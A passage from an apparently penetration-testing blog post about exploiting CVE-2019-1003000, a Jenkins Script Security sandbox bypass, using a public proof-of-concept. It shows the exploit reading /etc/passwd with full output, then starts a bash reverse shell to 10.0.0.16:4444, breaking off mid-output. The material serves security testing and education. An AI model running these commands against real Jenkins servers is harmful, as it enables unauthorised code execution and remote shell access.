\u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Epipeline-model-api\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;Pipeline: Model API\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 1.3.4.1\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Eworkflow-cps\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;Pipeline: Groovy\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;2.61 (2.63)\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Ebranch-api\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;Branch API Plugin\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 2.1.2\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Ejdk-tool\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;JDK Tool Plugin\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 1.2\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Ecloudbees-folder\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;Folders Plugin\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;6.7\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Edurable-task\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;Durable Task Plugin\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 1.29\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Ejunit\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; JUnit Plugin\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;1.27\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Escm-api\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; SCM API Plugin\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;2.3.0\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Eace-editor\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;JavaScript GUI Lib: ACE Editor bundle plugin\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;1.1\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Edisplay-url-api\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; Display URL API\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 2.3.0\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Eworkflow-support\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;Pipeline: Supporting APIs\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 3.2\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EAFAIK you cant enumerate plugins installed and their version without (elevated) authentication like you can with things like WordPress.\u0026nbsp; If you know how, please let me know.\u0026nbsp; For the time being i guess it's just throwing things to see what sticks.\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EAs I mentioned, the latest particular vulns are issues with installed Jenkins plugins. Taking a look at CVE-2019-1003000 (\u003Ca href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2019-1003000\" target=\"_blank\"\u003Ehttps:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2019-1003000\u003C\/a\u003E) we can see that it affects the Script Security Plugin (the nist.gov says 2.49 but it's a typo and should be 1.49) as seen on the Jenkins advisory\u0026nbsp;\u003Ca href=\"https:\/\/jenkins.io\/security\/advisory\/2019-01-08\/#SECURITY-1266\" target=\"_blank\"\u003Ehttps:\/\/jenkins.io\/security\/advisory\/2019-01-08\/#SECURITY-1266\u003C\/a\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EAn exploit for the issue exists and is available here:\u0026nbsp; \u003Ca href=\"https:\/\/github.com\/adamyordan\/cve-2019-1003000-jenkins-rce-poc\" target=\"_blank\"\u003Ehttps:\/\/github.com\/adamyordan\/cve-2019-1003000-jenkins-rce-poc\u003C\/a\u003E\u0026nbsp;it even comes with a docker config to spin up a vulnerable version to try it out on.\u0026nbsp; What's important about this particular exploit is that it IS post auth but it doesn't require script permissions, only Overall\/Read permission and Job\/Configure permissions.\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EI'm seeing more and more servers\/admins (rightfully) block access to the \u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Escript\u003C\/span\u003E \u0026amp;\u0026nbsp; \u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003EscriptText \u003C\/span\u003Econsole because it's well documented that is an immediate RCE.\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Ctable align=\"center\" cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"margin-left: auto; margin-right: auto; text-align: center;\"\u003E\u003Ctbody\u003E\n\u003Ctr\u003E\u003Ctd style=\"text-align: center;\"\u003E\u003Ca href=\"https:\/\/4.bp.blogspot.com\/-2KxC2zK7SaY\/XHbr5FZ9y8I\/AAAAAAAACa4\/1H3EiBt2X2M38PtqJvK3tfX2xm80Tiq6gCLcBGAs\/s1600\/Screen%2BShot%2B2019-02-27%2Bat%2B2.57.11%2BPM.png\" imageanchor=\"1\" style=\"margin-left: auto; margin-right: auto;\"\u003E\u003Cspan style=\"color: #444444;\"\u003E\u003Cimg border=\"0\" data-original-height=\"548\" data-original-width=\"1572\" height=\"138\" src=\"https:\/\/4.bp.blogspot.com\/-2KxC2zK7SaY\/XHbr5FZ9y8I\/AAAAAAAACa4\/1H3EiBt2X2M38PtqJvK3tfX2xm80Tiq6gCLcBGAs\/s400\/Screen%2BShot%2B2019-02-27%2Bat%2B2.57.11%2BPM.png\" width=\"400\" \/\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/td\u003E\u003C\/tr\u003E\n\u003Ctr\u003E\u003Ctd class=\"tr-caption\" style=\"text-align: center;\"\u003E\u003Cspan style=\"color: #444444;\"\u003Eno script permission\u003C\/span\u003E\u003C\/td\u003E\u003C\/tr\u003E\n\u003C\/tbody\u003E\u003C\/table\u003E\n\u003Cspan style=\"color: #444444;\"\u003EI encourage you to read the whole readme file in the repo but the most important part is here:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cblockquote class=\"tr_bq\" style=\"background-color: white; box-sizing: border-box; font-family: -apple-system, system-ui, \u0026quot;Segoe UI\u0026quot;, Helvetica, Arial, sans-serif, \u0026quot;Apple Color Emoji\u0026quot;, \u0026quot;Segoe UI Emoji\u0026quot;, \u0026quot;Segoe UI Symbol\u0026quot;; font-size: 16px; margin-bottom: 16px;\"\u003E\n\u003Cspan style=\"color: #444444;\"\u003EA flaw was found in Pipeline: Declarative Plugin before version 1.3.4.1, Pipeline: Groovy Plugin before version 2.61.1 and Script Security Plugin before version 1.50\u003C\/span\u003E\u003C\/blockquote\u003E\n\u003Cblockquote class=\"tr_bq\" style=\"background-color: white; box-sizing: border-box; font-family: -apple-system, system-ui, \u0026quot;Segoe UI\u0026quot;, Helvetica, Arial, sans-serif, \u0026quot;Apple Color Emoji\u0026quot;, \u0026quot;Segoe UI Emoji\u0026quot;, \u0026quot;Segoe UI Symbol\u0026quot;; font-size: 16px; margin-bottom: 16px;\"\u003E\n\u003Cspan style=\"color: #444444;\"\u003EThis PoC is using a user with Overall\/Read and Job\/Configure permission to execute a maliciously modified build script in sandbox mode, and try to bypass the sandbox mode limitation in order to run arbitrary scripts (in this case, we will execute system command).\u003C\/span\u003E\u003C\/blockquote\u003E\n\u003Cblockquote class=\"tr_bq\" style=\"background-color: white; box-sizing: border-box; font-family: -apple-system, system-ui, \u0026quot;Segoe UI\u0026quot;, Helvetica, Arial, sans-serif, \u0026quot;Apple Color Emoji\u0026quot;, \u0026quot;Segoe UI Emoji\u0026quot;, \u0026quot;Segoe UI Symbol\u0026quot;; font-size: 16px; margin-bottom: 16px;\"\u003E\n\u003Cspan style=\"color: #444444;\"\u003EAs a background, Jenkins's pipeline build script is written in groovy. This build script will be compiled and executed in Jenkins master or node, containing definition of the pipeline, e.g. what to do in slave nodes. Jenkins also provide the script to be executed in\u0026nbsp;\u003Cem style=\"box-sizing: border-box;\"\u003Esandbox mode\u003C\/em\u003E. In sandbox mode, all dangerous functions are blacklisted, so regular user cannot do anything malicious to the Jenkins server.\u003C\/span\u003E\u003C\/blockquote\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003ERunning the exploit:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp;python2.7 exploit.py --url http:\/\/localhost:8080 --job my-pipeline --username user1 --password user1 --cmd \"cat \/etc\/passwd\"\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E[+] connecting to jenkins...\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E[+] crafting payload...\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E[+] modifying job with payload...\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E[+] putting job build to queue...\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E[+] waiting for job to build...\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E[+] restoring job...\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E[+] fetching output...\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E[+] OUTPUT:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003EStarted by user User 1\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003ERunning in Durability level: MAX_SURVIVABILITY\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E[Pipeline] echo\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Eroot:x:0:0:root:\/root:\/bin\/ash\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Ebin:x:1:1:bin:\/bin:\/sbin\/nologin\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edaemon:x:2:2:daemon:\/sbin:\/sbin\/nologin\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Eadm:x:3:4:adm:\/var\/adm:\/sbin\/nologin\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Elp:x:4:7:lp:\/var\/spool\/lpd:\/sbin\/nologin\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Esync:x:5:0:sync:\/sbin:\/bin\/sync\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Eshutdown:x:6:0:shutdown:\/sbin:\/sbin\/shutdown\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Ehalt:x:7:0:halt:\/sbin:\/sbin\/halt\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Email:x:8:12:mail:\/var\/spool\/mail:\/sbin\/nologin\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Enews:x:9:13:news:\/usr\/lib\/news:\/sbin\/nologin\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Euucp:x:10:14:uucp:\/var\/spool\/uucppublic:\/sbin\/nologin\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Eoperator:x:11:0:operator:\/root:\/bin\/sh\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Eman:x:13:15:man:\/usr\/man:\/sbin\/nologin\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Epostmaster:x:14:12:postmaster:\/var\/spool\/mail:\/sbin\/nologin\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Ecron:x:16:16:cron:\/var\/spool\/cron:\/sbin\/nologin\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Eftp:x:21:21::\/var\/lib\/ftp:\/sbin\/nologin\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Esshd:x:22:22:sshd:\/dev\/null:\/sbin\/nologin\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Eat:x:25:25:at:\/var\/spool\/cron\/atjobs:\/sbin\/nologin\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Esquid:x:31:31:Squid:\/var\/cache\/squid:\/sbin\/nologin\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Exfs:x:33:33:X Font Server:\/etc\/X11\/fs:\/sbin\/nologin\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Egames:x:35:35:games:\/usr\/games:\/sbin\/nologin\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Epostgres:x:70:70::\/var\/lib\/postgresql:\/bin\/sh\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Ecyrus:x:85:12::\/usr\/cyrus:\/sbin\/nologin\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Evpopmail:x:89:89::\/var\/vpopmail:\/sbin\/nologin\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Entp:x:123:123:NTP:\/var\/empty:\/sbin\/nologin\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Esmmsp:x:209:209:smmsp:\/var\/spool\/mqueue:\/sbin\/nologin\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Eguest:x:405:100:guest:\/dev\/null:\/sbin\/nologin\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Enobody:x:65534:65534:nobody:\/:\/sbin\/nologin\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Ejenkins:x:1000:1000:Linux User,,,:\/var\/jenkins_home:\/bin\/bash\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E[Pipeline] End of Pipeline\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003EFinished: SUCCESS\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003Eyou can certainly pull a reverse shell from it as well.\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Epython2.7 exploit.py --url http:\/\/localhost:8080 --job my-pipeline --username user1 --password user1 --cmd \"bash -i \u0026gt;\u0026amp; \/dev\/tcp\/10.0.0.16\/4444 0\u0026gt;\u0026amp;1\"\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E[+] connecting to jenkins...\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E[+] crafting payload...\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E[+] modifying job with payload...\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E[+] putting job build to 